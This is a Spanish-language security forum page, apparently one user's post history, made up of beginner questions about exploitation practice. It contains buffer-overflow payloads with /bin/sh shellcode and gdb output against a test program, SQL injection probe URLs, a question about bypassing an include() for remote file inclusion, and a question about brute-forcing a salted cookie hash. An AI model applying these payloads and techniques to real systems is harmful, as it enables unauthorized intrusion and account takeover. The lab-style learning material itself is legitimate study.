elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18
71  Seguridad Informática / Bugs y Exploits / solo me falta saber porque no puedo saltar a la shell, que podria hago mal? en: 17 Mayo 2012, 04:16 am
bueno ya creo logre avanzar pero ahora tengo el problema que no logre hacer funcionar el exploit

les dire los pasos que hago para ver si me pueden ayudar mas facilmente

primero desactivo
Código:
randomize_va_space

Citar
cat /proc/sys/kernel/randomize_va_space
0

compilo el archivo vulnerable de esta manera

Citar
gcc -ggdb --no-stack-protector vuln.c -o vuln

ejecuto gdb y meto la cantidad de "A" que son necesarios

Citar
$(perl -e 'print "A" x 44 . "B" x 4')

Citar
(gdb) i r eip ebp
eip            0x42424242   0x42424242
ebp            0x41414141   0x41414141
(gdb)

lo que quiere decir que si pongo una shell tendria que quedar... "A" = 44 - 25 = 19

Citar
$(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4')

Citar
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r eip ebp
eip            0x42424242   0x42424242
ebp            0x80cd0bb0   0x80cd0bb0

Aqui es donde tengo que buscar donde esta RET, lo hago de esta manera

Citar
$(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) br overflow
Breakpoint 1 at 0x80483ea: file vuln.c, line 6.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA

Breakpoint 1, overflow (badbeef=0xbffff602 "AAA") at vuln.c:6
6      strcpy(buffer, badbeef);
(gdb) x/x buffer
0xbffff380:   0x00000000
(gdb)

al parecer es
Código:
0xbffff380:	0x00000000

pero aqui viene el problema si pongo eso no me aparce ninguna shell, que podria estar mal?

Citar
$(perl -e 'print "\x90" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x80\xf3\xff\xbf"')

Program received signal SIGSEGV, Segmentation fault.
0xbffff380 in ?? ()
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)


espero me puedan ayudar, abajo les dejo el codigo del archivo vulnerable

salu2

Código
  1. #include <stdio.h>
  2. #include <string.h>
  3.  
  4. void overflow(char *badbeef){
  5. char buffer[32];
  6. strcpy(buffer, badbeef);
  7. }
  8.  
  9. int main(int argc, char *argv[]){
  10. overflow(argv[1]);
  11. return 0;
  12. }
72  Seguridad Informática / Bugs y Exploits / no puedo conseguir RET en un exploit de linux [RESUELTO] en: 14 Mayo 2012, 21:05 pm
hola

una duda... en un tuto de Garfield07, al usar gdb y poner un break en una funcion al usar este comando le aparece el RET

Código:
Breakpoint 1, vuln (buff=0xbffffb5f "AAA") at vuln.c:8
8        strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff904:    0x00000000

pero yo al hacerlo me aparece diferente

Citar
(gdb) r $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) br vuln
Breakpoint 1 at 0x804845a: file vuln.c, line 8.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA

Breakpoint 1, vuln (buff=0xbffff604 "AAA") at vuln.c:8
8       strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff37c:   0xb7fbfff4

y al continuar con la execucion para visualizar la shell me aparece esto

Código:
(gdb) r $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x7c\xf3\xff\xbf"')
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x7c\xf3\xff\xbf"')

Breakpoint 1, vuln (
    buff=0xbffff5d3 "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\061\300Ph//shh/bin\211\343P\211\342S\211\341\260\v̀|\363\377\277") at vuln.c:8
8    strcpy (buffer, buff);
(gdb) c
Continuing.

Program received signal SIGILL, Illegal instruction.
0xbffff37e in ?? ()

al principio me llamo la atencion "Illegal instruccion" asi que use x/x buff y me salio

Código:
0xbffff604:	0x00414141

asi que a los NOP le aumente a "r AAAA" y me aparce

Código:
0xbffff603:	0x41414141

no se si eso tenga algo que ver, igual el ret me aparece igual

alguien sabe que podria salir mal o que otra manera podria encontrar RET?

como informacion adicional uso debian con gcc-4.6
73  Seguridad Informática / Bugs y Exploits / porque al usar breakpoint con GDB no me aparece nada?[RESUELTO] en: 13 Mayo 2012, 01:34 am
hola

estaba practicando sobre exploits en linux

ya entendi como hacer una shell con asm y obtener los opcodes, para hacer la shellcode usando nasm y hexadump, estuve leyendo el tuto de Smashing The Stack For Fun And Profit tambien

ahorita estaba recordando unos post sobre eso y quise volver a intentarlo

antes no me salia ciertas cosas que ya comprendi...

ahora tengo un problema con GDB, cuando uso este codigo

Código:
#include <stdio.h>
#include <string.h>
 
int vuln (char *buff)
{
    char buffer [36];
    strcpy (buffer, buff);
}
 
int main (int argc, char *argv [])
{
    vuln (argv [1]);
}
 
int feo ()
{
    printf ("Eres feo!!!");
    exit (0);
}

lo executo con gdb y coloco esto, en mi version debian le tuve que cambiar los nop's porque se necesitó mas

Código:
r $(perl -e 'print "\x90" x 23 . "B" x 25 . "XXXX"')

ahora me aparece esto correctamente

Código:
/vuln $(perl -e 'print "\x90" x 23 . "B" x 25 . "XXXX"')

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()

aqui supuestamente me deberia de aparecer algo asi usando un break en la funcion vuln

Código:
(gdb) br vuln
Breakpoint 1 at 0x804842a: file vuln.c, line 8.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/juanra/Escritorio/Shell/vuln AAA

Breakpoint 1, vuln (buff=0xbffffb5f "AAA") at vuln.c:8
8        strcpy (buffer, buff);

pero a mi no me sale eso, de hecho no sale nada

Código:
(gdb) br vuln
Breakpoint 1 at 0x804845a
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA

Breakpoint 1, 0x0804845a in vuln ()


que podria estar saliendo mal, ya intente incluso usar el break con buff y buffer y tampoco

espero me puedan ayudar, porque apenas estoy tratando de entender como encontrar el RET para el exploit

salu2
74  Programación / Programación C/C++ / porque no puedo realizar este ejercicio?, es por el compilador? en: 11 Mayo 2012, 04:26 am
hola

tengo un codigo de un tutorial sobre exploits, pero no logro saber porque no me funciona

Código
  1. #include <stdio.h>
  2. #include <string.h>
  3.  
  4. int main(){
  5.  
  6. int array[5];
  7. int i;
  8.  
  9. for (i = 0; i <= 255; i++){
  10.  
  11.   array[i] = 10;
  12.  
  13. }
  14.  
  15. }

el codigo en si, funciona bien, pero supuestamente al compilarlo tendria que salir de esta forma

Código
  1. shellcoders@debian:~/chapter_2$ cc buffer2.c
  2. shellcoders@debian:~/chapter_2$ ./a.out
  3. Segmentation fault (core dumped)

sin embargo, cuando lo hago no me aparece

Código:
gazette@gazetto:~/ejercicios$ ./a.out
gazette@gazetto:~/ejercicios$

creen que podria ser por el compilador, utilizo gcc-4.6 y este tutorial es del 2007 creo todavia se usaba gcc-3.xx, pero no tengo idea si es por el compilador que tengo un resultado diferente o porque mas podria ser?

en la pagina de gnu solo esta la version gcc-3.2 pero no se si intentar instalarlo o si eso no tiene nada que ver

lo supuse porque AlbertoBSD en un tutorial explica las diferencias entre gcc-4 y gcc-3 al crear un exploit

espero me puedan ayudar, salu2

75  Seguridad Informática / Bugs y Exploits / sera que no puedo executar exploits en linux por la version gcc? en: 10 Mayo 2012, 20:31 pm
hola

estaba siguiendo un sencillo ejemplo de exploit sobre linux y en el inicio muestra esto

Código:
#include <stdio.h>
#include <string.h>

int main(){

int array[5];
int i;

for (i = 0; i <= 255; i++){

   array[i] = 10;
   
}

}

y me dice que al executarlo me tendria que aparecer esto

Código:
shellcoders@debian:~/chapter_2$ cc buffer2.c
shellcoders@debian:~/chapter_2$ ./a.out
Segmentation fault (core dumped)

pero cuando yo lo hago no me aparece nada

Citar
gazette@gazetto:~/ejercicios$ ./a.out
gazette@gazetto:~/ejercicios$

sera acaso que uso gcc-4.6?, talvez aqui usaron otra version pero no especifican... alguien podria decirme porque no podria funcionar esto ya que siempre tengo el problema de que quiero leer algun tuto sobre exploit en linux y nunca puedo porque algo sale diferente, y ahorita se me ocurrio que prodria ser por el compilador

espero me puedan ayudar....salu2
76  Seguridad Informática / Nivel Web / porque no puedo ver los mensajes de error de mysql como " SQL syntax near"? en: 10 Mayo 2012, 19:02 pm
hola

estoy siguendo este tutorial

Citar
+--------------------------------------------------------+
|                                                                   |
|      SQL injection && Blind Sql Injection      |
|                                                                   |
|                   Escrito por l0ve              |
|                                                                   |
+--------------------------------------------------------+

en el menciona bugs como por ejemplo

Código:
http://localhost/print.php?id=1'

donde me tendria que aparecer

Código:
You have an error in your SQL syntax near ''..................

pero por mas cosas que le pongo como me menciona el tuto no me aparece ese error, incluso con cosas como

Código:
http://localhost/print.php?id=1 and 1=1

nisiquiera con eso me aparece algo, unicamente si lo dejo normal me aparece bien la pagina

Código:
http://localhost/print.php?id=1

sera acaso que mysql ya viene corregido eso?, o cual podria ser la causa de que no me aparezcan esos errores?

salu2
77  Seguridad Informática / Nivel Web / no entiendo bien sobre que es un token, un referer y secs en: 2 Mayo 2012, 06:40 am
hola

perdon la ignorancia, pero me podrian explicar que son los token y los referer? y para que sirven

estuve viendo el post donde gano yoya, y el documento de universal hacking y creo entender que los token son los usuarios, pero que son esos numeros?, es el usuario cifrado?, pero en el documento no aparecen numeros sino el usuario completo

y el referer por lo que lei del post de yoya es la ultima direccion visitada, pero que relacion tiene con secs?

y que son los secs?, peron por tanta pregunta perocreo comprender el metodo de yoya pero no entiendo sobre que es token, referer y secs

espero me puedan ayuda

salu2
78  Seguridad Informática / Nivel Web / como podria hacer un RFI con esto? en: 20 Febrero 2012, 03:12 am
hola

una pregunta, quise probar como hacer un RFI pero segui un manual donde decia que a veces hay codigo en el que se usa include() para redireccionar un archivo php, algo asi me aparecio despuede buscar en una pagina

pero cuando hago el intento segun en el ejemplo al poner un link con el php, la pagina lo pone en include redireccionando, lo intente pero me quedo asi

include(Content/content_index.php.php)

con lo que me di cuenta que antes de ponerlo, le incluye "content_" y ".php", y mi pregunta es

como puedo hacer RFI si a lo que le ponga me pondra asi "content_www.paginaweb.com/index.php.php"?

hay forma de lograrlo?, espero me puedan orientar

salu2

79  Seguridad Informática / Hacking / ayuda, aprendiendo a descifrar cookies en: 19 Febrero 2012, 22:59 pm
hola

tengo ganas de aprender sobre hacking nivel web, ya e estado leyendo varios tuto e incluso me meti a wazone a hacer las pruebas, me gusto la prueba cocinar, cuando logre pasarla descubri algo que no sabia, no dire mas para no arruinar la prueba

ahora quisiera hacer una prueba con una cuenta mia, me logue en mi cuenta de otro foro y tome mi cookie, siempre escuche que al robar una cookie tendrias acceso a varios lugares, mi pregunta es

como descifro, segun entendi sobre varios manuales, hay varias formas, ya vi una, pero vbulletin creo las cifra en md5 con salt

ahora estoy usando un prograa llamado pasword pro y utilizo la funcion md5($pass,$salt)

no se si este bien usar esa... y lo hago en fuerza bruta, el codigo de la cokkie que se hizo aleatoriamente es esta

27785fe9c5bb9af9fb95a5c14d2118c7

quisiera saber si estare en lo correcto al hacer eso o habra otra forma?

una vez vi un video de defcom, mostrando algo de eso, y reducia el tiempo de busqueda con fechas y no se que mas, alguien sabe algo de esto?
80  Seguridad Informática / Nivel Web / me podrian decir donde hay mas scripts para aprender sobre auditoria web? en: 17 Febrero 2012, 21:26 pm
hola

pues tengo ganas de aprender sobre auditoria sobre web, la mayor parte del tiempo me dedique a programar por ejemplo exploits, troyanos, y programas para probar la seguridad de los antivirus etc, jeje, casi nunca pude lograr hacerlo con otras computadoras porque siempre me gusto programar mis propias herramientas y cuando las terminaba, aparecia el anuncio de que tal metodo ya no funcionaria, los malditos routers, DEP, ASLR, heuristica, etc... pero bueno, lo poco que si logre hacer funcionar me gusto

pero ahora me gustaria saber mas sobre auditorias para mysql, php, html, etc... ya tenia ganas de hace tiempo y comenzaba a investigar pero como todo buen foro siempre llega nueva informacion y queria intentarlo y dejaba de lado la web

ahora quiero retomarlo bien, he estado leyendo el post de temas destacados y veo bastante informacion, pero conocen algunos scripts o algunos link done haya ejemplos?

porque hay mucha teoria que se que debo de leer, pero soy de los que entienden mas practicando, porque suelo cambiar cosas para ir poniendo las cosas mas dificiles e ir mejorando en lo que aprendo

alguien me podria compartir algunos ejemplos que pueda poner en mi servidor de apache para practicar, ahorita solo encontre un post hecho por zhynar_X, seguire su tutorial pero me gustaria saber si hay mas tutoriales de esa forma

gracias, salu2
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines